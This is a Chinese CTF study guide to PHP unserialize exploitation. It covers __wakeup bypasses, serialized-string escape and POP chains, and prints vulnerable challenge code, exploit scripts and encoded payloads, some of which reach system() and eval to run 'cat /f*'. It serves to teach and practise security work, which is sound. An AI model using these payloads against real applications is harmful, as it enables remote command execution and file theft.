[PHP 反序列化参考手册]

一、简单的反序列化题目

1.P1

task.php

<?php
highlight_file(__FILE__);class NSS {var $name;function __destruct() {if ($this->name === 'ctf') {echo getenv('FLAG');}}
}unserialize($_GET['n']); 

exp.php

<?phpclass NSS {var $name='ctf';}$a=new NSS();
print(urlencode(serialize($a)));//O%3A3%3A%22NSS%22%3A1%3A%7Bs%3A4%3A%22name%22%3Bs%3A3%3A%22ctf%22%3B%7D

2.[SWPUCTF 2021 新生赛]ez_unserialize

task.php

 <?phperror_reporting(0);
show_source("cl45s.php");class wllm{public $admin;public $passwd;public function __construct(){$this->admin ="user";$this->passwd = "123456";}public function __destruct(){if($this->admin === "admin" && $this->passwd === "ctf"){include("flag.php");echo $flag;}else{echo $this->admin;echo $this->passwd;echo "Just a bit more!";}}
}$p = $_GET['p'];
unserialize($p);?> 

exp.php


O%3A4%3A%22wllm%22%3A2%3A%7Bs%3A5%3A%22admin%22%3Bs%3A5%3A%22admin%22%3Bs%3A6%3A%22passwd%22%3Bs%3A3%3A%22ctf%22%3B%7D<?phpclass wllm{public $admin="admin";public $passwd="ctf";}$a=new wllm();
print(urlencode(serialize($a)));
//O%3A4%3A%22wllm%22%3A2%3A%7Bs%3A5%3A%22admin%22%3Bs%3A5%3A%22admin%22%3Bs%3A6%3A%22passwd%22%3Bs%3A3%3A%22ctf%22%3B%7D

二、wake_up 绕过

1.P3

task.php

 <?php
highlight_file(__FILE__);class NSS {var $name;function __wakeup() {$this->name = '1';}function __destruct() {if ($this->name === 'ctf') {echo getenv('FLAG');}}
}unserialize($_GET['n']); 

exp.php

<?phpclass NSS {var $name='ctf';
} $a=new NSS();print(urlencode(serialize($a)));//O%3A3%3A%22NSS%22%3A1%3A%7Bs%3A4%3A%22name%22%3Bs%3A3%3A%22ctf%22%3B%7D
//O%3A3%3A"NSS"%3A2%3A{s%3A4%3A"name"%3Bs%3A3%3A"ctf"%3B}

2.[极客大挑战 2019]PHP

task.php

<?php
include 'flag.php';error_reporting(0);class Name{private $username = 'nonono';private $password = 'yesyes';public function __construct($username,$password){$this->username = $username;$this->password = $password;}function __wakeup(){$this->username = 'guest';}function __destruct(){if ($this->password != 100) {echo "</br>NO!!!hacker!!!</br>";echo "You name is: ";echo $this->username;echo "</br>";echo "You password is: ";echo $this->password;echo "</br>";die();}if ($this->username === 'admin') {global $flag;echo $flag;}else{echo "</br>hello my friend~~</br>sorry i can't give you the flag!";die();}}
}
?>

exp.php

<?phpclass Name{private $username = 'nonono';private $password = 'yesyes';public function __construct($username,$password){$this->username = $username;$this->password = $password;}function __wakeup(){$this->username = 'guest';}function __destruct(){if ($this->password != 100) {echo "</br>NO!!!hacker!!!</br>";echo "You name is: ";echo $this->username;echo "</br>";echo "You password is: ";echo $this->password;echo "</br>";die();}if ($this->username === 'admin') {global $flag;echo $flag;}else{echo "</br>hello my friend~~</br>sorry i can't give you the flag!";die();}}
}
$a=new Name("admin","100");print(urlencode(serialize($a)));//O%3A4%3A%22Name%22%3A2%3A%7Bs%3A14%3A%22%00Name%00username%22%3Bs%3A5%3A%22admin%22%3Bs%3A14%3A%22%00Name%00password%22%3Bs%3A3%3A%22100%22%3B%7D//O%3A4%3A%22Name%22%3A3%3A%7Bs%3A14%3A%22%00Name%00username%22%3Bs%3A5%3A%22admin%22%3Bs%3A14%3A%22%00Name%00password%22%3Bs%3A3%3A%22100%22%3B%7D

三、反序列化字符逃逸

1.字符增加

(1).task.php

<?php
error_reporting(0);class a
{public $uname;public $password;public function __construct($uname,$password){$this->uname=$uname;$this->password=$password;}public function __wakeup(){if($this->password==='yu22x'){include('flag.php');echo $flag;	}else{echo 'wrong password';}}}function filter($string){return str_replace('Firebasky','Firebaskyup',$string);
}$uname=$_GET[1];
$password=1;
$ser=filter(serialize(new a($uname,$password)));
$test=unserialize($ser);
?>

思路分析

需要反序列化后的password变成yu22x

我们随便带入一个username,password修改为yu22x得到目标字符串

<?phpclass a
{public $uname;public $password;public function __construct($uname,$password){$this->uname=$uname;$this->password=$password;}public function __wakeup(){if($this->password==='yu22x'){include('flag.php');echo $flag;	}else{echo 'wrong password';}}
}$b=new a('admin','yu22x');
echo serialize($b);#O:1:"a":2:{s:5:"uname";s:5:"admin";s:8:"password";s:5:"yu22x";}

其中我们需要利用的子串是";s:8:“password”;s:5:“yu22x”;}长度30位。

观察替换规则,由Firebasky变成Firebaskyup字符增加2,因此我们需要15个Firebasky

得到payload:

FirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebasky";s:8:"password";s:5:"yu22x";}

(2).index.php

<?php
error_reporting(0);
class message{public $from;public $msg;public $to;public $token='user';public function __construct($f,$m,$t){$this->from = $f;$this->msg = $m;$this->to = $t;}
}$f = $_GET['f'];
$m = $_GET['m'];
$t = $_GET['t'];if(isset($f) && isset($m) && isset($t)){$msg = new message($f,$m,$t);$umsg = str_replace('fuck', 'loveU', serialize($msg));setcookie('msg',base64_encode($umsg));echo 'Your message has been sent';
}highlight_file(__FILE__);

message.php

<?php
highlight_file(__FILE__);
include('flag.php');class message{public $from;public $msg;public $to;public $token='user';public function __construct($f,$m,$t){$this->from = $f;$this->msg = $m;$this->to = $t;}
}if(isset($_COOKIE['msg'])){$msg = unserialize(base64_decode($_COOKIE['msg']));if($msg->token=='admin'){echo $flag;}
}

思路分析

我们需要把message中的token修改为admin获得flag

首先得到目标字符串

<?phpclass message{public $from;public $msg;public $to;public $token='admin';public function __construct($f,$m,$t){$this->from = $f;$this->msg = $m;$this->to = $t;}
}$b=new message('1','2','3');
echo serialize($b);#O:7:"message":4:{s:4:"from";s:1:"1";s:3:"msg";s:1:"2";s:2:"to";s:1:"3";s:5:"token";s:5:"admin";}

我们需要构造的子串是";s:5:“token”;s:5:“admin”;},长度为27,观察替换规则,一个fuck,变成一个loveU,字符增加1,我们需要27个fuck。

payload:

?f=1&m=1&t=fuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuck";s:5:"token";s:5:"admin";}

然后访问messa.php获得flag

(3).index.php

<?php
highlight_file(__FILE__);
function waf($str){return str_replace("bad","good",$str);
}class GetFlag {public $key;public $cmd = "whoami";public function __construct($key){$this->key = $key;}public function __destruct(){system($this->cmd);}
}unserialize(waf(serialize(new GetFlag($_GET['key']))));

思路分析

通过控制GetFlag当中的cmd来执行不同的系统命令,获得flag。

假设我们想要执行ls命令,那么目标字符串就是 O:7:“GetFlag”:2:{s:3:“key”;s:1:“1”;s:3:“cmd”;s:2:“ls”;}

那么我们需要构造的字串是";s:3:“cmd”;s:2:“ls”;},长度为22,观察替换规则,bad变为good,这时候增加一个字符,因此需要22个bad。

payload:

?key=badbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbad";s:3:"cmd";s:2:"ls";}

这时候,我们成功执行了ls命令

最终payload:

?key=badbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbad";s:3:"cmd";s:7:"cat /f*";}

2.字符减少

(1).task.php

<?php
function filter($string){$filter = '/pp/i';return preg_replace($filter,'W',$string);
}
$username = "ppurlet"
$age = "10";
$user = array($username,$age);var_dump (serialize($user));    # 序列化
echo "<pre>";
$r = filter(serialize($user)); # 替换后序列化
var_dump ($r);
var_dump (unserialize($r));     # 打印反序列
?>
//将age修改为20

思路分析

目标字符串 a:2:{i:0;s:7:“ppurlet”;i:1;s:2:“20”;}

如果我们控制age=20,正常序列化的结果是;i:1;s:2:“20”;}

在其前边插入任意字符和双引号序列化之后得到:a:2:{i:0;s:7:“Wurlet”;i:1;s:17:“1”;i:1;s:2:“20”;}";}

需要吞掉";i:1;s:17:"1这个字符串也就是13个字符。

<?php
function filter($string){$filter = '/pp/i';return preg_replace($filter,'W',$string);
}
$username = "pppppppppppppppppppppppppp"; //长度为13
$age = '1";i:1;s:2:"20";}'; //正常序列化的结果
$user = array($username,$age);var_dump (serialize($user));    # 序列化
echo "<pre>";
$r = filter(serialize($user)); # 替换后序列化
var_dump ($r);
var_dump (unserialize($r));     # 打印反序列
?>
//将age修改为20

四、POP链构造

P5

task.php

<?php
highlight_file(__FILE__);class NSS1 {var $name;function __destruct() {echo $this->name;}
}class NSS2 {var $name;function __toString(){echo getenv('FLAG');}
}unserialize($_GET['n']); 

exp.php

<?phpclass NSS1 {var $name;
}class NSS2 {var $name;}$a=new NSS1();
$a->name=new NSS2();
echo(serialize($a));

P6

task.php

<?php
highlight_file(__FILE__);class NSS1 {var $name;function __destruct() {echo $this->name;}
}class NSS2 {var $name;function __toString(){echo $this->name->test;}
}class NSS3 {var $name;var $res;function __get($name){$this->name->getflag();}function __call($name, $arguments){if ($this->res === 'nssctf') {echo getenv('FLAG');}}
}
unserialize($_GET['n']); 

思路分析

调用链:NSS1__destruct() → \rightarrow NSS2.__toString() → \rightarrow NSS3.__get() → \rightarrow NSS3.____call()

exp.php

<?phpclass NSS1 {var $name;function __destruct() {echo $this->name;}
}class NSS2 {var $name;function __toString(){echo $this->name->test;}
}class NSS3 {var $name;var $res;function __get($name){$this->name->getflag();}function __call($name, $arguments){if ($this->res === 'nssctf') {echo getenv('FLAG');}}
}$a=new NSS1();
$a->name=new NSS2();
$a->name->name=new NSS3();
$a->name->name->name=new NSS3();
$a->name->name->name->res='nssctf';
echo serialize($a);//O:4:"NSS1":1:{s:4:"name";O:4:"NSS2":1:{s:4:"name";O:4:"NSS3":2:{s:4:"name";O:4:"NSS3":2:{s:4:"name";N;s:3:"res";s:6:"nssctf";}s:3:"res";N;}}}

P7

task.php

<?php
highlight_file(__FILE__);class NSS1 {var $name;function __destruct() {echo $this->name;}
}class NSS2 {var $name;private $test;function __set($name, $value) {$a = $this->test;$a($value);}function __toString() {$this->name->{$this->test}();}
}class NSS3 {var $name;var $res;function __invoke($v) {echo $this->name->flag($v);}function flag($a) {if ($a === '1') {return getenv('FLAG');}}function __call($name, $arguments){$this->name->a = '1';}
}
unserialize($_GET['n']); 

思路分析

调用链:

NSS1.destruct() → \rightarrow NSS2.toString() → \rightarrow NSS3.call() → \rightarrow NSS2.set() → \rightarrow NSS3.invoke() → \rightarrow NSS3.flag

需要注意的是,在NSS2中test是私有属性,因此要通过成员函数赋值。

exp.php

<?phpclass NSS1 {var $name;
} 
class NSS2 {var $name;private $test;function setTest($v) {$this->test=$v;}
}
class NSS3 {var $name;var $res;
}
$a=new NSS1();
$a->name=new NSS2();
$a->name->setTest('1');
$a->name->name=new NSS3();
$a->name->name->name=new NSS2();$b = new NSS3();
$b->name = new NSS3();
$a->name->name->name->setTest($b);
echo(urlencode(serialize($a)));

[SWPUCTF 2021 新生赛]pop

task.php

 <?phperror_reporting(0);
show_source("index.php");class w44m{private $admin = 'aaa';protected $passwd = '123456';public function Getflag(){if($this->admin === 'w44m' && $this->passwd ==='08067'){include('flag.php');echo $flag;}else{echo $this->admin;echo $this->passwd;echo 'nono';}}
}class w22m{public $w00m;public function __destruct(){echo $this->w00m;}
}class w33m{public $w00m;public $w22m;public function __toString(){$this->w00m->{$this->w22m}();return 0;}
}$w00m = $_GET['w00m'];
unserialize($w00m);?> 

思路分析

调用链:w22m.destruct() → \rightarrow w33m.tostring → \rightarrow w44m.Getflag()

exp.php

<?phpclass w44m{private $admin = 'w44m';protected $passwd = '08067';
}class w22m{public $w00m;
}class w33m{public $w00m;public $w22m;
} $a=new w22m();
$a->w00m=new w33m();
$a->w00m->w00m=new w44m();
$a->w00m->w22m="Getflag";
echo urlencode(serialize($a));//O%3A4%3A%22w22m%22%3A1%3A%7Bs%3A4%3A%22w00m%22%3BO%3A4%3A%22w33m%22%3A2%3A%7Bs%3A4%3A%22w00m%22%3BO%3A4%3A%22w44m%22%3A2%3A%7Bs%3A11%3A%22%00w44m%00admin%22%3Bs%3A4%3A%22w44m%22%3Bs%3A9%3A%22%00%2A%00passwd%22%3Bs%3A5%3A%2208067%22%3B%7Ds%3A4%3A%22w22m%22%3Bs%3A7%3A%22Getflag%22%3B%7D%7D

exp2.php

<?phpclass w44m{private $admin = '123456';protected $passwd = '123';function SetAdmin($v){$this->admin=$v;}function SetPasswd($x){$this->passwd=$x;}
}class w22m{public $w00m;
}class w33m{public $w00m;public $w22m;
} $a=new w22m();
$a->w00m=new w33m();
$b=new w44m();
$b->SetAdmin('w44m');
$b->SetPasswd('08067');
$a->w00m->w00m=$b;
$a->w00m->w22m="Getflag";
echo urlencode(serialize($a));//O%3A4%3A%22w22m%22%3A1%3A%7Bs%3A4%3A%22w00m%22%3BO%3A4%3A%22w33m%22%3A2%3A%7Bs%3A4%3A%22w00m%22%3BO%3A4%3A%22w44m%22%3A2%3A%7Bs%3A11%3A%22%00w44m%00admin%22%3Bs%3A4%3A%22w44m%22%3Bs%3A9%3A%22%00%2A%00passwd%22%3Bs%3A5%3A%2208067%22%3B%7Ds%3A4%3A%22w22m%22%3Bs%3A7%3A%22Getflag%22%3B%7D%7D

[NISACTF 2022]babyserialize

task.php

<?php
include "waf.php";
class NISA{public $fun="show_me_flag";public $txw4ever;public function __wakeup(){if($this->fun=="show_me_flag"){hint();}}function __call($from,$val){$this->fun=$val[0];}public function __toString(){echo $this->fun;return " ";}public function __invoke(){checkcheck($this->txw4ever);@eval($this->txw4ever);}
}class TianXiWei{public $ext;public $x;public function __wakeup(){$this->ext->nisa($this->x);}
}class Ilovetxw{public $huang;public $su;public function __call($fun1,$arg){$this->huang->fun=$arg[0];}public function __toString(){$bb = $this->su;return $bb();}
}class four{public $a="TXW4EVER";private $fun='abc';public function __set($name, $value){$this->$name=$value;if ($this->fun = "sixsixsix"){strtolower($this->a);}}
}if(isset($_GET['ser'])){@unserialize($_GET['ser']);
}else{highlight_file(__FILE__);
}//func checkcheck($data){
//  if(preg_match(......)){
//      die(something wrong);
//  }
//}//function hint(){
//    echo ".......";
//    die();
//}
?>

思路分析

由危险函数eval,推出invoke,进而是Ilovetxw的tostring,进而是four里的strtolower,进而是four里的set,进而是Ilovetxw的call,进而是TianXiWei里的wakeup

因此,调用链:TianXiWei::wakeup → \rightarrow Ilovetxw::call → \rightarrow four::set → \rightarrow four::strtolower → \rightarrow Ilovetxw::tostring → \rightarrow NISA::invoke → \rightarrow NISA::eval

waf里边过滤了system和其他函数,但是可以大小写绕过。

exp.php

<?phpclass NISA{public $fun="";public $txw4ever='System("cat /f*");';
}class TianXiWei{public $ext;public $x;
}class Ilovetxw{public $huang;public $su;
}class four{public $a="TXW4EVER";private $fun='sixsixsix';
}$xx=new TianXiWei();
$xx->ext=new Ilovetxw();
$xx->ext->huang=new four();
$xx->ext->huang->a=new Ilovetxw();
$xx->ext->huang->a->su=new NISA();
echo urlencode(serialize($xx));//O%3A9%3A%22TianXiWei%22%3A2%3A%7Bs%3A3%3A%22ext%22%3BO%3A8%3A%22Ilovetxw%22%3A2%3A%7Bs%3A5%3A%22huang%22%3BO%3A4%3A%22four%22%3A2%3A%7Bs%3A1%3A%22a%22%3BO%3A8%3A%22Ilovetxw%22%3A2%3A%7Bs%3A5%3A%22huang%22%3BN%3Bs%3A2%3A%22su%22%3BO%3A4%3A%22NISA%22%3A2%3A%7Bs%3A3%3A%22fun%22%3Bs%3A0%3A%22%22%3Bs%3A8%3A%22txw4ever%22%3Bs%3A18%3A%22System%28%22cat+%2Ff%2A%22%29%3B%22%3B%7D%7Ds%3A9%3A%22%00four%00fun%22%3Bs%3A9%3A%22sixsixsix%22%3B%7Ds%3A2%3A%22su%22%3BN%3B%7Ds%3A1%3A%22x%22%3BN%3B%7D

phar反序列化

待续。。。。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/686219.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

算法刷题day14

目录 引言一、平均二、三国游戏三、松散子序列 引言 今天做了三道新题&#xff0c;类型是贪心、枚举、DP&#xff0c;不是特别难&#xff0c;但是努力一下刚好能够够得上&#xff0c;还是不错的&#xff0c;只要能够一直坚持下去&#xff0c;不断刷题不断总结&#xff0c;就是…

【数据结构之排序算法】

数据结构学习笔记---010 数据结构之排序算法1、排序的基本概念及其运用1.1、常见排序算法的实现2、插入排序的实现2.1、直接插入排序2.1.1、直接插入排序的实现2.1.1.1、直接插入排序InsertSort.h2.1.1.2、直接插入排序InsertSort.c2.1.1.3、直接插入排序main.c2.1.2、直接插入…

【MySQL】多表关系的基本学习

&#x1f308;个人主页: Aileen_0v0 &#x1f525;热门专栏: 华为鸿蒙系统学习|计算机网络|数据结构与算法 ​&#x1f4ab;个人格言:“没有罗马,那就自己创造罗马~” #mermaid-svg-3oES1ZdkKIklfKzq {font-family:"trebuchet ms",verdana,arial,sans-serif;font-siz…

【双指针】:Leetcode611.有效三角形的个数

朋友们、伙计们&#xff0c;我们又见面了&#xff0c;本专栏是关于各种算法的解析&#xff0c;如果看完之后对你有一定的启发&#xff0c;那么请留下你的三连&#xff0c;祝大家心想事成&#xff01; C 语 言 专 栏&#xff1a;C语言&#xff1a;从入门到精通 数据结构专栏&…

Linux操作系统基础(十二):yum软件包管理器

文章目录 yum软件包管理器 一、yum常用命令 二、yum在线安装软件案例 三、yum在线删除软件案例 yum软件包管理器 yum&#xff08; Yellow dog Updater, Modified&#xff09;是一个在 Fedora 和 RedHat中的 Shell 前端软件包管理器。基于RPM包管理&#xff0c;能够从指定的…

Java基于微信小程序的畅阅读微信小程序

博主介绍&#xff1a;✌程序员徐师兄、7年大厂程序员经历。全网粉丝12w、csdn博客专家、掘金/华为云/阿里云/InfoQ等平台优质作者、专注于Java技术领域和毕业项目实战✌ &#x1f345;文末获取源码联系&#x1f345; &#x1f447;&#x1f3fb; 精彩专栏推荐订阅&#x1f447;…

CS50x 2024 - Lecture 6 - Python

00:00:00 - Introduction 00:01:01 - Python print("hello world")与c的显著差异 1.不必显式包含标准库 2.不再需要定义main函数 00:07:24 - Speller 00:13:41 - Filter from PIL import Image, ImageFilterbefore Image.open("bridge.jpg") after…

nginx upstream server主动健康监测模块添加https检测功能

1 缘起 前面的《nginx upstream server主动健康检测模块ngx_http_upstream_check_module 使用和源码分析》系列已经分析了ngx_http_upstream_check_module的实现原理&#xff0c;并且在借助这个模块的框架实现了一个udp健康检测的新功能。   但是ngx_http_upstream_check_mod…

h5和微信小程序实现拍照功能(其中h5暂时无法调用闪光灯)

代码如下 <template><view class"camera"><!-- #ifdef MP --><camera ref"myCamera" id"myCamera" device-position"back" :flash"flash" error"error" style"display: block;"&…

《中国教育报》2024投稿攻略

《中国教育报》2024投稿攻略 《中国教育报》普通版&#xff0c;1800字符1/4版&#xff0c;2300字符1/3版&#xff1b;周期1-2个月 《中国教育报》理论版 收中小学&#xff0c;全包1800字符&#xff1b;2500字符。收高校 2000-2300字符&#xff0c;六个月周期。 《中国教育…

人工智能学习与实训笔记(一):零基础理解神经网络

人工智能专栏文章汇总&#xff1a;人工智能学习专栏文章汇总-CSDN博客 本篇目录 一、什么是神经网络模型 二、机器学习的类型 2.1 监督学习 2.2 无监督学习 2.3 半监督学习 2.4 强化学习 三、网络模型结构基础 3.1 单层网络 ​编辑 3.2 多层网络 3.3 非线性多层网络…

C++11---(1)

目录 一、C11简介 二、列表初始化 2.1、{ } 初始化 三、变量类型推导 3.1、auto 3.2、decltype 为什么需要decltype 四、final和override 4.1、final 4.2、override 五、默认成员函数控制 5.1、default修饰函数 5.2、delete修饰函数 六、nullptr 一、C11简介 C11是…

【STM32 CubeMX】STM32中断体系结构

文章目录 前言一、中断体系的比喻二、中断的内部结构2.1 EXTI触发方式 2.2 NVIC2.3 cpu与中断2.4 外部中断控制器框图上升沿触发选择寄存器屏蔽/使能寄存器等待处理寄存器 2.5 中断优先级 总结 前言 一、中断体系的比喻 STM32中断体系如下图所示&#xff1a; 一座大型建筑物…

STM32F1 - 系统时钟SysTick

SysTick 1> SysTick硬件框图2> SysTick的时钟源3> 1ms定时_中断方式4> 思考&#xff1a;无符号数 0 - 255 ?相关资料 1> SysTick硬件框图 SysTick属于Cotex-M3&#xff0c;是CPU外设&#xff1b; SysTick: 位宽24bit&#xff0c; 递减计数&#xff0c;自动重装…

Matplotlib plt.plot数据可视化应用案例

Matplotlib 是 Python 中一个非常流行的绘图库&#xff0c;它允许用户创建各种静态、动态、交互式的图表和可视化。plt.plot() 是 Matplotlib 中用于绘制二维数据的基本函数。 下面是一个使用 plt.plot() 的简单数据可视化应用案例&#xff1a; 案例&#xff1a;绘制正弦和余…

让你的资金运动起来,金钱的聪明处理方式

一、教程描述 本套教程主要讲解了金融思维和财务思维&#xff0c;常见投资工具的实操技巧&#xff0c;资产配置方案的制定方法&#xff0c;等等&#xff0c;将会重构你现有的投资观念&#xff0c;提升你认知的宽度和深度&#xff0c;可以轻松读懂财经新闻&#xff0c;不仅学会…

spring boot3登录开发-2(1图形验证码接口实现)

⛰️个人主页: 蒾酒 &#x1f525;系列专栏&#xff1a;《spring boot实战》 &#x1f30a;山高路远&#xff0c;行路漫漫&#xff0c;终有归途。 目录 前置条件 内容简介 图形验证码接口实现 导入糊涂工具依赖 接口分析 编写验证码接口 测试验证码接口 前置条件 …

2024年通信安全员ABC证证模拟考试题库及通信安全员ABC证理论考试试题

题库来源&#xff1a;安全生产模拟考试一点通公众号小程序 2024年通信安全员ABC证证模拟考试题库及通信安全员ABC证理论考试试题是由安全生产模拟考试一点通提供&#xff0c;通信安全员ABC证证模拟考试题库是根据通信安全员ABC证最新版教材&#xff0c;通信安全员ABC证大纲整理…

【Linux 04】编辑器 vim 详细介绍

文章目录 &#x1f308; Ⅰ 基本概念&#x1f308; Ⅱ 基本操作1. 进入 / 退出 vim2. vim 模式切换 &#x1f308; Ⅲ 命令模式1. 光标的移动2. 复制与粘贴3. 剪切与删除4. 撤销与恢复 &#x1f308; Ⅳ 底行模式1. 保存文件2. 查找字符3. 退出文件4. 替换内容5. 显示行号6. 外…

ElementUI Form:Cascader 级联选择器

ElementUI安装与使用指南 Cascader 级联选择器 点击下载learnelementuispringboot项目源码 效果图 el-cascader.vue&#xff08;Select选择器&#xff09;页面效果图 项目里el-cascader.vue代码 <script> let id 0; export default {name: el_cascader,data() {re…